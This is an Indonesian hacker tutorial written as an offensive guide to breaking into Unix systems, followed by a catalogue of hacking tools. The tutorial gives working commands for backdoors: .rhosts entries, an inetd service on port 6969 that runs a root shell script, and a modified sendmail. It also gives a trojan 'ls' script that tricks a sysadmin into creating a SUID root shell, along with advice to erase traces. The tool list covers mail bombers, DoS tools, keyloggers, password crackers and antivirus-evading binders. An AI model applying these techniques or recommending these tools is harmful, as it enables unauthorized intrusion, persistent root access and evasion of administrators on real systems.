      'pemanfaatan kelemahan dari sebuah sistem untuk tujuan-tujuan yang diluar
      dari penggunaan normal.' Kelemahan-kelemahan ini bisa berupa kesalahan
      pemrograman, sesuatu yang tidak direncanakan oleh pemrogram asli, dan
      lain-lain. Umumnya, yang jelas paling menarik perhatian kita, adalah
      eksploit yang akan memberikan kita akses tidak terbatas ke seluruh aspek
      dari sebuah sistem. Dalam UNIX, sering kita dengar istilah 'mengeksploit
      program anu untuk mendapat privilese root'. Tentu saja mendapatkan 'root'
      bukanlah satu-satunya tujuan pengeksploitan sistem. Seperti yang mungkin
      anda sudah alami sendiri, kadang sebuah cacat dalam program seperti maild
      atau ftpd bisa dimanfaatkan untuk tujuan 'header forging', 'ip spoofing',
      'denial of service attack', dan 'mail bombing' (hello, Anton Pardede!).

      Eksploit secara besar sering dibagi menjadi dua, yaitu eksploit lokal dan
      eksploit remote. Eksploit lokal adalah jenis eksploit yang hanya bisa
      dijalankan jika kamu sudah punya akses ke dalam suatu sistem (baik itu
      melalui login telnet, ftp, dll). Eksploit jenis ini jumlahnya banyak,
      sebab kamu sudah punya akses ke ribuan program yang berpotensi untuk
      di-eksploit. Contoh - contoh dari eksploit jenis ini adalah buffer
      overflow (i.e. mh di RedHat 5, SuperProbe, dll), race conditions (dimana
      dua proses saling berlomba untuk menyelesaikan tugas masing-masing,
      biasanya proses A disuruh untuk menjalankan suatu utilitas yang
      membutuhkan privilese root temporer sementara proses B dirancang untuk
      mencegat proses A sebelum proses A kembali statusnya ke privilese user
      biasa, mengakibatkan di-spawn-nya shell beridentitas root - sering terjadi
      di mesin-mesin IRIX dan SunOS.) Bagaimana caranya agar saya bisa
      mendapatkan eksploit seperti ini? Tentu saja kamu bisa menghabiskan waktu
      berjam-jam untuk mengutak-utik sebuah program sampai berhasil kamu jebol
      (lebih baik dilakukan di kotak kamu sendiri), seperti para 'elite'
      lainnya. Biasanya eksploit diprogram dengan C, perl, atau sh. Namun kalau
      ilmu kungfu kamu masih kayak kami (dan emang bawaannya malas), banyak
      eksploit yang sudah didokumentasi dan tersedia melalui websearch, atau di
      situs-situs tertentu, seperti:
      http://www.rootshell.com
      http://www.antionline.com
      http://www.rhino9.com
      http://www.dhp.com/~fyodor
      atau di situs kecoak, http://k-elektronik.org/arsip/eksploit

      Eksploit jenis satunya lagi adalah eksploit remote, dimana kamu bisa
      mengeksploit sistem tanpa mengetahui otorisasi user/password. Tentu saja
      eksploit-eksploit jenis ini jauh lebih sedikit jumlahnya, dan terkadang
      dampaknya juga tidak separah eksploit lokal. Lubang cgi phf adalah salah
      satu contoh dari pemanfaatan eksploit remote untuk mendapatkan file
      /etc/passwd (dulu LithErr pernah memberi resep cepat memanfaatkan phf).
      Mungkin belum terlihat fatal, namun sekalinya sang 'cracker' berhasil
      masuk ke dalam sistem memanfaatkan login dan password dari salah seorang
      user, maka dia bisa menjalankan eksploit-eksploit lokal untuk mendapatkan
      akses tak terbatas milik root. Eksploit port 143 (IMAPd) malahan lebih
      gila lagi, dengan memberikan akses root tanpa password. Apa trik dan tip
      yang kira-kira berguna untuk memanfaatkan eksploit-eksploit remote? Jelas
      sebuah portscanner sangatlah bermanfaat untuk melihat port-port mana saja
      yang menerima koneksi. Beberapa jenis 'scanner' lebih terfokus lagi,
      seperti cgi scanner dari kecoak (roachscan) yang saat dijalankan akan
      memeriksa direktori cgi-bin dari sejumlah server sekaligus, mencari file
      password atau jalan masuk lainnya, melalui beberapa jenis eksploit umum.
      Satu program lain yang mungkin ada gunanya adalah 'netcat', bisa didapat
      dari http://www.l0pht.com. Untuk menghemat waktu, banyak cracker yang
      menulis skrip otomasi, jalankan skrip, tinggal berikan daftar
      target-target dan tinggalkan untuk sementara waktu. Kembali lagi sejam
      atau dua jam kemudian, tinggal diperiksa server-server mana saja yang ada
      lobangnya, bisa dieksploit atau tidak, dll (coba lihat artikel-artikel
      mengenai scanning/probing di situs-situs hacker).

      Terkadang ada juga eksploit yang tidak begitu jelas jenisnya, seperti
      eksploit lynx mailer, yang walaupun kodenya sendiri terletak di host lain,
      namun untuk digunakan masih perlu campurtangan dari user lokal untuk bisa
      bekerja (saat user meng-click sebuah link, sang eksploit akan mengirimkan
      file password ke alamat email tertentu.)

      2. Backdoor

      Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat
      belakang'. Backdoor berfungsi untuk memberikan sang programmer akses ke
      suatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentu
      saja sang programer di sini bisa juga diartikan 'sang penyusup'.
      Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga
      yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar
      (baik hardware maupun software ) yang sengaja menempatkan backdoor tak
      terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikel
      ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke
      dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan
      menyadari bahwa ada penyerang di dalam sistem.

      Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan
      berhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segera
      menjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root.
      Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan
      harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu
      atau lebih jalan masuk 'alternatif'. Jelas, sebagian besar teknik-teknik
      backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.
      Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses
      root, tetapi untuk mendapatkan akses root LAGI setelah sang sysadmin
      menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap
      selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi
      dari host kamu akan ditolak. Tentu saja kalian-kalian, sang cracker,
      kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa
      sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif
      dengan privilese root.

      Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti
      Backdoor di router-router, printserver, dll buatan 3Com), namun disini
      akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem
      UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah dengan
      melalui file /.rhosts:

      korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts

      perintah diatas akan menambah satu entri di file .rhosts (sistem luar
      -dalam contoh diatas user ganjaman dari indohack2.ri.go.id - yang boleh
      mengakses account tanpa password), dan untuk masuk kembali ke sistem dari
      account "ganjaman" di indohack2.ri.go.id :

      ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

      poof! shell root tanpa password!
      Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan
      entri berikut dari file /etc/passwd sebuah sistem:

      bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false

      tentunya bagi mereka yang sering memanen password entri seperti di atas
      sudah tidak asing lagi. Account diatas adalah account yang digunakan oleh
      UNIX sistem secara internal. Seringkali banyak diantara crackers yang
      mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet
      dengan nama login "bin" tidak memerlukan password. Tapi ingatlah bahwa
      file /etc/passwd biasanya adalah file pertama yang akan diperiksa oleh
      sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar
      kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts di
      home directory milik bin. Kembali ke entri file password diatas, bisa kita
      lihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id,
      namun kita masih juga tidak bisa mendapatkan shell sebab account 'bin'
      dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masalah
      ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau
      /bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren
      kung fu nya, sang sysadmin akan mensetup sebuah skrip yang memeriksa
      keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah
      entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau
      string unik lainnya yang bukan merupakan nama file.

      Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya
      ini hanyalah rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada
      tuh yang namanya root daemon - tapi metode ini benar-benar cocok disebut
      rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat
      salah satu port yang didefinisikan dalam "inetd":

      root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >>
      /etc/services
      root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >>
      /etc/inetd.conf
      root@korban# echo "echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r

      menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem
      yang cukup dahsyat, namun tidak akan segera tampak. Penjelasan dari ketiga
      perintah diatas:
      1. mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor
      port lain yang tidak begitu mencurigakan, silakan pilih mulai dari 1024
      sampai 65000-an), sedangkan "Network Traffic Control Protocol" adalah
      karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya
      sysadmin tidak akan begitu curiga dengan nama seperti itu.
      2. memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r
      setiapkali sang sistem menerima koneksi telnet lewat port 6969. Sayangnya
      mengeksekusi sebuah shell berprivilese root lewat cara ini hanya akan
      mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan
      perintah-perintah selayaknya kita login lewat jalur normal. Sang shell
      akan tetap dijalankan, namun tidak akan bisa mengeksekusi perintah kita.
      Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu
      lebih pintar dan memilih nama yang tidak begitu mencurigakan seperti
      /tmp/dev001).
      3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang
      baru saja kita luncurkan (id=0 - root!). Tentunya kamu bisa saja menulis
      skrip yang lebih kompleks. Namun untuk menghemat tempat, kita lancarkan
      saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari
      mesin host kita ke file .rhosts milik root.
      Tentu jika sang admin memang keren kung funya, rlogind akan
      dikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika kamu
      periksa isi direktori dan file "history" milik root dan isinya menunjukkan
      bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas
      akan memberikan jalan masuk lewat belakang ke dalam sistem target (idih,
      kesannya kayak cerita-cerita porno anal seks aja!). Sekarang kamu tinggal:

      ganjaman@indohack2> telnet korban.lameisp.net.id 6969

      nah, sistem kamu akan tersambung ke sistem target lewat port 6969,
      sedangkan daemon inet di mesin korban akan menerima sambungan tersebut,
      menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan
      dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik
      root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali
      menggarap sistem target (sebaiknya dilakukan saat itu juga, sebab sang
      sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port
      6969) kamu tinggal:

      ganjaman@indohack2> rlogin -l root korban.lameisp.net.id

      dan, BOOM!

      korban#

      shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar
      ke indohack@hotmail.com, bertitel "Terimakasih, suhu Ganjaman dan
      SuperCock, atas ilmu ngent... engin badannya ..." :) ). Tapi ingatlah untuk
      segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu
      kamu emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi
      udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala
      spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik, serangan
      bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan
      service-service yang jarang (hampir tidak pernah dipakai) seperti
      utilitas-utilitas X, segala utilitas berkepala "r", dan banyak lagi.

      Metode lain yang cukup populer adalah dengan membuat sebuah file dengan
      bit SUID tambahan, namun cara ini gampang terdeteksi jika kebetulan sistem
      mempunyai program audit keamanan yang akan mensensus seluruh file berbit
      SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi
      homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu
      program yang sudah berjalan / terinstal secara default, seperti xterm dan
      splitvt, sehingga sebuah option rootshell akan secara otomatis
      execv("/bin/sh", "sh", NULL);.

      Kalau kamu emang pendekar asli (dan entah kenapa sedang membaca artikel
      kelas kacangan ini), kamu bisa modifikasi daemon-daemon yang sedang
      berjalan untuk menerima perintah-perintah hasil karangan kamu sendiri.
      Berikut adalah cuplikan dari metode milik Hacker nagageni 212 yang telah
      berhasil memodifikasi program sendmail di server korban.com (PSM=Pukulan
      Sinar Matahari):
      212@GG> telnet korban.com 25
      Trying mesin.korban.com ...
      Connected to mesin.korban.com.
      Escape character is '^]'.
      220 mesin.korban.com ESMTP Sendmail 8.8.5/8.8.5; ... [snip] ...
      PSM_EXEC /bin/cp /bin/sh /tmp/elit
      Done ... master!
      PSM_EXEC /bin/chmod 4755 /tmp/elit
      Done ... master!

      Jika menurut kamu cuplikan diatas sudah cukup familiar, maka kami dengan
      segala kerendahan hati minta izin untuk berguru!

      3 Trojan Horse
      ===============
      Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnya
      Trojan Horse hanya efektif jika kamu betul-betul pintar menutupi suatu
      program atau jika sang sysadmin memang betul-betul tolol. Pada prinsipnya,
      Trojan Horse adalah program yang mempunyai 'feature' gelap. Misalnya kamu
      membuat sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkan
      perintah untuk membuka akses di dalam kode game kamu, sedemikian rupa
      sehingga saat sang sysadmin menjalankan program tersebut, tanpa
      disadarinya file .rhosts nya telah ketambahan sesuatu. Kami kenal seorang
      hacker yang lihai menulis skrip IRC, dan skrip IRC-nya kebetulan mempunyai
      banyak peminat. Beberapa 'lamers' mendownload skrip tersebut tanpa
      menyadari bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkan
      akses tak berpassword kepada sang penulis asli skrip. (Hello, Tut!)

      4 Trapdoor
      ===========
      Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namun
      dalam artikel ini, 'Trapdoor' diasumsikan sebagai cara yang bisa kita
      gunakan untuk menjebak (trap) sang sysadmin untuk memberikan kita akses
      root kedalam sistem. Seringkali kita terbentur masalah sistem operasi yang
      paling gres, atau sebuah sistem dimana hampir semua eksploit untuk
      mendapatkan root tidak berjalan sama sekali (patched systems). Jangan
      putus asa! Masih banyak metode yang bisa kita terapkan untuk membuat sang
      sysadmin tertipu, berakibat dibukanya akses ke dalam sistem. Misalkan kamu
      sudah berhari-hari mengoprek sebuah target dengan menggunakan account dan
      password seorang user biasa hasil colongan lewat phf, dan sayangnya tidak
      ada exploit yang mempan. Nah, sudah saatnya kita terapkan metode Trapdoor.
      Berikut adalah metode Trapdoor yang walaupun sederhana, masih saja bisa
      mengelabui puluhan sysadmin diluar sana.

      Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedir
      milik user yang accountnya kamu 'pinjam'):

      user1@korban> chmod 700 ~/.

      Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlu
      mengganti privilesenya ke root jika beliau ingin memeriksa isi direktori
      ybs. Nah, langkah berikutnya adalah membuat sebuah skrip yang bertugas
      untuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuan
      sang admin, justru membuka satu (atau beberapa) kelemahan dalam sistem.
      Yang langsung terpikir olehmu, jelas, perintah ls. Disinilah letak
      kelemahan UNIX dibanding ... uh, MS-DOS. Dalam UNIX, seorang sysadmin yang
      baik selalu mengetik 'full pathname' dari program manapun yang dia
      jalankan (seperti /bin/ls atau /usr/sbin/vi index.html), dan untuk tujuan
      kemudahan, biasanya /bin atau /usr/sbin sudah dimasukkan dalam daftar
      search path. Jadi jika misalnya sang sysadmin melakukan:

      root# pwd
      /usr/home/staff/user1
      root# ls

      maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulan
      dalam direktori /usr/home/staff/user1 kita letakkan sebuah skrip bernama
      'ls'? Heheheh ... cukup menarik, khan. Nah, sekarang kita bisa buat sebuah
      skrip yang berisi:

      #!/bin/sh
      cp /bin/sh /tmp/vi-save-902887
      chown root /tmp/vi-save-902887
      chmod 4755 /tmp/vi-save-902887
      rm ./ls
      ls

      simpan skrip tersebut di homedir user1, beri nama "ls" dan

      user1@korban> chmod +x ls

      sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untuk
      mengecek isi homedir user1. Jika kamu kebetulan punya login/passwd untuk
      user2 di mesin yang sama, maka kamu bisa saja 'mengundang' sang admin.
      Login sebagai user1, dan kirim imel

      user1@korban> mail root@localhost
      Subject: "Heheheh ... Kena garap dari belakang!"
      Hello sysadmin tolol! Mesin kamu sudah kebobolan!
      ttd,
      God of All Hackers, Virus Researchers and Lame Mailbombers,
      Phardera
      .

      Saat menerima imel ini, sang Syadmin pun akan segera memeriksa isi homedir
      user1 (dengan perintah ls, tentunya), dan tanpa disadari sang sysadmin
      telah menciptakan sebuah shell root di /tmp/vi-save-902887. Dan, karena
      vi-save-902887 ber-SUID root, kamu bisa melakukan bermacam-macam hal
      menyenangkan dengannya. Tinggal login sebagai user2 beberapa waktu
      kemudian, dan nikmati ketenangan pikiran lewat shell root

      Relate Post

      Hacking Tools Dan Pengertianya

      Backdoor: Mengganggu kendali dan komputer komputer dengan program klien.
      Crack tools: Crack Password dari aplikasi atau sistem, Crack nomor urut.
      Disassembler: Membongkar program dengan itu. Jika anda mempunyai suatu yang executable memfile, anda dapat lihat source program dari file dengan itu.
      DoS tool: Perhentian komputer buatan untuk bereaksi terhadap permintaan apapun dengan alat ini, sehingga orang lain tidak bisa mengakses komputer.
      Dokumen: Dokumen tentang Hacking, cracker, dan lain lain
      E-mail tools: Menghancurkan sistem komputer dengan menggunakan alat ini, alat adalah semua berhubungan dengan E-mail. yang meliputi beberapa alat tentang E-mail, sebagai contoh, email bomber, tools untuk temukan seseorang email alamat, dan lain lain
      Editor: Edit atau memodifikasi program mu
      Encryption & decryption tools: Encrypt file dari hampir jenis apapun menggunakan algoritma ilmu membaca sandi banyak orang yang kuat.
      tools file yang Executable: Menggerakkan file yang yang executable dengan alat ini, mengikat file beberapa yang yang executable, merobek satu file yang yang executable, dan lain lain So, sebagai contoh, anda dapat menambahkan satu file yang yang executable untuk yang lain.
      ICQ tools: Menghancurkan sistem komputer dengan menggunakan alat ini, alat adalah semua berhubungan dengan ICQ. Semua program di dalamnya bekerja dengan ICQ. Dengan alat, anda dapat melakukan berbagai hal banyak orang, sebagai contoh, menyembuhkan Password ICQ’s, berbagi file mu, dan encrypting pesan ICQ mu, dan seterusnya.
      Keylogger: Merekam tombol ketika program sedang runing, sehingga anda dapat mendapat/kan informasi beberapa yang bermanfaat, sebagai contoh, Password.
      MISC: Menguji source program untuk lubang keamanan, Hacking game, dan lain alat yang menarik untuk kedua-duanya linux dan windows.
      Packet forging: Memodifikasi paket data di jaringan sesuka hati.
      Phreak tools: Menguji sistem dan pemancar pemberian nomor halaman, dan seterusnya, yang meliputi kotak dan wardialier.
      Scanner: Memperoleh informasi sistem, sebagai contoh, Port yang terbuka, OS, dan seterusnya.
      Sniffer: Menginterupsi dan menangkap data di jaringan.
      Snoop tools: Menunjukkan informasi dari sistem mu. Sebagai contoh, yang dapat menunjukkan alamat IP dari komputer mu, atau yang dapat menunjukkan tools ATAPI dan SCSI di sistem mu, dan seterusnya.
      Source program: Source program dari banyak alat.
      Spoof: Membypass suatu wakil HTTP, [menyimpan/pelihara] koneksi aktip, mu, menciptakan angka-angka kartu kredit yang palsu, ip Spoof, dan lain lain
      Virus: Source program dari virus dan virus yang executable.

      Backdoor

      1. Back Orifice: alat tentang back orifice.
      2. Backdoor kit: Koleksi dari banyak program backdoor.
      3. Backdoor source: Sumber dari program backdoor.
      4. Minigift: program Backdoor yang lain.
      5. Net spy: Ijinkan anda untuk menguasai komputer lain yang menggunakan internet.
      6. Trojan: Mengendalikan computer lain

      Crack tools

      1. AMI Crack: Crack Ami BIOS.
      2. AMI Decoder: Crack Password dari BIOS ami.
      3. ARJ Cracker: Password letusan/juara dilindungi ARJ Files.
      4. AW: Crack Password dari BIOS.
      5. Adv Office 2000 Password Recovery ( ahli):): Crack Password.
      6. Adv Office 2000 Password Recovery ( std): Crack Password.
      7. Archive Password Recovery tingkat lanjut: Crack Password dari arsip.
      8. Excel 2000 Password Recovery tingkat lanjut: Suatu program ke pemulihan yang hilang atau dilupakan Password ke files/dokumenen yang diciptakan di Microsoft Excel.
      9. Nt Security Explorer tingkat lanjut: Suatu aplikasi untuk pengurus sistem NT/2000/XP Windows untuk menemukan lubang di keamanan sistem.
      10. Outlook Express Password Recovery tingkat lanjut: Crack pandangan menyatakan Password.
      11. Pdf Password Recovery Pro tingkat lanjut: Crack Password PDF.
      12. Word 2000 Password Recovery tingkat lanjut: Crack Password dari word 2000.
      13. Zip Password Recovery tingkat lanjut: Crack Password dari zip.
      14. Ami cracker BIOS: Crack Password dari BIOS ami.
      15. BIOS / CMOS alat: Crack Password dari CMOS dan BIOS.
      16. Cryptoexplorer untuk Borland Paradox: recovery Password Borland Paradox.
      17. Dictionary: Yang digunakan oleh cracker untuk Crack Password.
      18. Dictionary Maker: Kamus buatan memfile untuk Crack Password.
      19. FBRUTE: Crack Password yang unix.
      20. Hades cracker: Crack Password.
      21. The Ripper Yohanes: Crack Password untuk unix.
      22. Kill CMOS ver 1.00: Crack Password dari CMOS.
      23. L0Phtcrack 2.01: recovery Password untuk Windows NT.
      24. Lilo crack: Crack Password dari lilo.
      25. Linux Crack: Crack Password di linux.
      26. Lotus 1-2-3 Password Recovery Key: 1-2-3 Key adalah suatu program untuk recovery Password untuk dokumen Lotus 1-2-3.
      27. Word Pro Password Recovery Key : recovery Lotus Word Pro Password.
      28. Access Password Detection MS (Microsoft): Crack Password dari Access MS (Microsoft).
      29. Mac crack: Crack Password di Mac.
      30. Mailpassword: Pemulihan hilang Password dari E-mail.
      31. Makepwl: Menciptakan file PWL.
      32. Ntpassword: Temukan lubang di keamanan sistem.
      33. PGP Crack: Crack PGP.
      34. PWLCRACK: Crack file PWL.
      35. Palmcrack 1.1: Password yang menguji tools untuk Palm Computing Platform.
      36. Passware Kit: recovery Password.
      37. Recovery Tools Password: recovery Password beberapa.
      38. Password dictionaries: Yang digunakan oleh cracker untuk Crack Password.
      39. Pwltools: recovery login Password.
      40. Quicken Password Recovery Key: recovery Password.
      41. Register: Mendaftarkan perangkat lunak.
      42. Rempass Ver 2.6: Crack Password dari BIOS.
      43. serial 2000: Crack kode daftar.
      44. Serial Number: Yang digunakan oleh cracker untuk Crack s/n.
      45. THC-CUPASS: Crack Password dari pemakai di suatu server WindowsNT/W2K.
      46. THC-PRINTDATES: Password letusan/juara dengan menggunakan tanggal/date.
      47. Unix mercon Password: Crack Password untuk unix..
      48. Windows Crack: Crack Password di windows.
      49. Windows password crackers: Crack Password di windows.
      50. Word List: Kamus kata
      51. Wordperfect Password Recovery Key: recovery Password untuk file dokumen WordPerfect.
      52. Wzippwd: Menciptakan nomor urut sah untuk Winzip.
      53. ZIP Cracker: Crack ZIP Files yang adalah Password dilindungi.
      54. iMesh Password Recovery: recovery suatu Password menginstall di klien iMesh.
      55. variation tool: persiapan daftar kata yang digunakan oleh cracker untuk Crack Password.

      Disassembler
      1. ASMGEN: Suatu program untuk menghasilkan kode bahasa asembler disesuaikan-salib dari manapun file yang yang executable.
      2. Bubble Chamber: Membongkar file yang yang executable.
      3. Dodi’S Visual Basic Tools: Dodi adalah suatu kotak VB.
      4. PROVIEW: Meneliti dan memandang sistem.
      5. Disassembler Windows: Disassembe Windows executables dan perpustakaan mata rantai yang dinamis.

      DoS tool

      1. Black:: Membom komputer seseorang
      2. IGMP Nuker: Membom komputer lain dengan tools yang populer ini.
      3. Windows DoS kit: Menyerang sistem komputer dengan alat yang bermanfaat ini.
      4. pagebomb: Membom windows pager dengan tools ini.
      5. windows95/98 patch: Menambal anda sistem untuk tujuan menghindari serangan oleh Hackings.

      Dokumen

      1. Artikel tentang hack: Memperkenalkan pengetahuan beberapa tentang pengarang sewaan.
      2. Artikel tenteng hacker: bagaimana cara menjadi suatu Hacker.
      3. Artikel tentang DoS: tentang apa dengan serangan DoS itu.
      4. Artikel tentang Crack: Mengajar anda bagaimana cara Crack.
      5. Artikel tentang programming: Memperkenalkan pengetahuan beberapa tentang memprogram.
      6. Artikel tentang hack: Menceriterakan pengetahuan beberapa tentang hack.
      7. Buku tentang Hacking: Menceriterakan pengetahuan beberapa tentang Hacking.
      8. buku Tentang linux: Memperkenalkan informasi tentang linux.
      9. Buku tentang jaringan: Ceritakan [kepada] anda pengetahuan tentang jaringan.
      10. Buku tentang programming: Memperkenalkan pengetahuan beberapa tentang memprogram.
      11. Dokumen tentang jargon: Ceritakan [kepada] anda beberapa tentang jargon.
      12. Dokumen tentang pbx: Memperkenalkan beberapa pbx pengetahuan.
      13. Dokumen tentang yang phreaking: Memperkenalkan pengetahuan tentang phreaking.
      14. Dokumen yang lain: Memperkenalkan anda informasi beberapa.
      15. Phrack Dokumen: Mendiskusikan beberapa masalah tentang phrack.
      16. Trojans Removal Database: Menguraikan banyak program Trojan.

      E-mail tools

      1. Anima: Membom beberapa’ komputer lain dengan bomber tool(e-mail ini).
      2. Anonymous emailer: Mengirimkan E-mail tanpa dikenali.
      3. Bomber: Membom seseorang E-mail kotak dengan itu.
      4. E-mail box bomber: Membom beberapa E-mail kotak dengan alat ini.
      5. Euthanasia: Membom  E-mail lain menunjuk dengan tools ini.
      6. Extreme mailer: Membom beberapa victim’s E-mail menunjuk dengan itu.
      7. Haktek: Gunakan program ini untuk menyerang korban mu atau melindungi diri anda dari hack.
      8. Kaboom!: bom E-mail .
      9. Mail Bomb: Membom korban dengan E-mail bomber.
      10. News Mail Agent : menemukan email address di news group
      11. Quick Fyre: Quickfyre adalah anonymous emailer mail bomber
      12. Stealth Mailer: Mengirimkan pengeboman ke orang lain dengan tools ini.
      13. Unabomb: Mengirimkan orang-orang email pengeboman.
      14. Mail Agent web: mencari alamat E-mail di internet

      Editor

      1. HEXCALIBUR: Pengujian, memodifikasi atau memanipulasi file disk di format raw, atau biner format.
      2. HEXPERT untuk Windows: Mengedit windows multi-format file yang biner.
      3. Hex Workshop: Edit, memasukkan/menyisipkan, menghapus, potong,, copy, dan lekatkan hex ke file mu.
      4. Hexedit: Mengedit file yang mentah mu.
      5. Hiew: LE/LX-executable tempat sampah dan File NE-executable tempat sampah memfile.
      6. Hack Wizard catatan: Ijinkan anda untuk Hacking atau memodifikasi catatan bahasa banyak orang dengan mudah.
      7. Support Files: Menambahkan file yang perlu yang penggunaan script hack wizard untuk runing

      Encryption & decryption tools

      1. Apocalypso: Crypto tools dari HNC.
      2. Cryptonite Pro: Gunakan suatu superfast 64 bit encryption algoritma di Windows 95/98/Me.
      3. Easyfp: Melaksanakan file encryption untuk melindungi map/brosur dan file mu dari dibaca oleh (orang) yang lain.
      4. Encryption: Encrypt informasi sistem mu oleh empat alat.
      5. Encryption alat: Pengumpulan suatu sangat besar munber dari encryption dan decryption alat.
      6. Encryptonite: Encrypt dan decrypt teks memfile dengan itu dengan mudah.
      7. HTML Encrypt: Encrypt program HTML/Script mu.
      8. Macintosh Encryption: Meliputi berbagai Macintosh encryption alat.
      9. Netmangler: Encrypt mu emails dan melindungi diri anda dengan NetMangler.
      10. PC-ENCRYPT: Memampatkan dan encrypt hampir manapun jenis file.
      11. PGPFREEWARE: Melindungi pandangan email format yang tidak syah mu.
      12. Webpassword: Melindungi halaman web mu dengan Password.
      13. Winsafe: Encrypt file mu dengan algoritma beberapa yang kuat.

      Tools file Executable

      1. Bound File Detector & Remover:Mendeteksi file yang berhubungan dengan tools ini.
      2. Exe memfile tools: Mengatur file exe dengan alat ini.
      3. Fusion: Enable static, virtual atau link yang dinamis, dengan kontrol versi yang canggih ketika menggunakan link yang dinamis.
      4. Multi Binder: Mengikat jumlah tak terbatas dari file, tipe EXE/BAT .
      5. Newjoiner: Menghindari av pendeteksian.
      6. PEBUNDLE: Mempertimbangkan DLLs atau lain file untuk ada ?? bundled???? dengan suatu file yang yang executable.
      7. Topo: Scan di semua bagian untuk untuk mendapatkan area ‘usable’
      8. Winsplit: memisahkan  Dan menggabungkan file dengan tools ini.
      9. inPEct: Mengikat 2 executables jadi satu
      10. inPEct source program: Mengikat 2 executables jadi satu

      ICQ tools

      1. Icq Password Recovery tingkat lanjut: recovery Password ke ICQ memegang buku.
      2. Aquila: recovery Password.
      3. ICQ Document: Ada dua dokumen tentang ICQ.
      4. ICQ File Share: share file lewat internet  dengan temen
      5. ICQ MachineGun: Menyerang komputer korban dengan ICQ.
      6. ICQ Box: Menyerang korban mu dengan alat ini.
      7. ICQR Information: Yang dibaca dan mengungkapkan informasi pribadi menyimpan di Mirabilis ICQ Database (. DAT) file.
      8. PGP-ICQ: Encrypt pesan ICQ mu.
      9. Secureicq: Ijinkan anda ke pesan encrypt anda mengirimkan dan untuk decrypt pesan encrypted anda menerima.
      10. Send It Agent : Mengirimkan data sangat besar cepat sekali [bagi/kepada] para pemakai ICQ.
      11. Source program tentang ICQ: Snoop traffic ICQ untuk seperangkat host

      Keylogger

      1. G2Kbiosspoof: Password BIOS Spoof untuk pintu gerbang pc’s hanya.
      2. Hookthis: yang di-set Suatu sangkutan-papan tombol systemwide.
      3. Hooker: Membuat trojan cerdas keylogger modul.
      4. Invisible KeyLogger Stealth: Memonitor aktivitas komputer untuk mencuri informasi kunci dengan cara terselubung.
      5. Keyghost: Merekam tombol dengan tiny module  ke atas klip kabel keyboard
      6. Keyspy: Program mata-mata seperti sebuah keyboard logger dan sebuah PC remote controller
